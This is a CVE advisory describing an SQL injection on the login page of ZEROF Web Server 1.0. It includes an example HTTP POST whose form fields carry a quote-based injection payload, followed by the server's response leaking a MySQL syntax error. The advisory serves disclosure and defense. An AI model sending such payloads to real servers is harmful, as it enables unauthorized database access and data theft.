CVE-2021-30175
Description
ZEROF Web Server 1.0 (April 2021 version) allows SQL Injection on login page.
Additional Information
Parameters received by the web application must be sanitized and filtered to prevent the execution of control constructs
Vulnerability Type
SQL Injection
Vendor of Product
Zerof
Affected Product Code Base
ZEROF Web Server - 1.0 (april 2021)
Affected Component
Attack Type
Remote
Impact Code execution
true
Impact Information Disclosure
true
Discoverer
- Anna Sidorova
- AWILLIX LLC
Attack Vectors
Example:
POST /HandleEvent HTTP/1.1
Host: zerof
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126
Ajax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff"&_seq_=2&_uo_=O
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 209
Date: Wed, 07 Apr 2021 10:33:44 GMT
Server: ZEROF Web Server
try{_rsov_(O33,0);_rsov_(O37,0);}finally{alert("#42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1.");}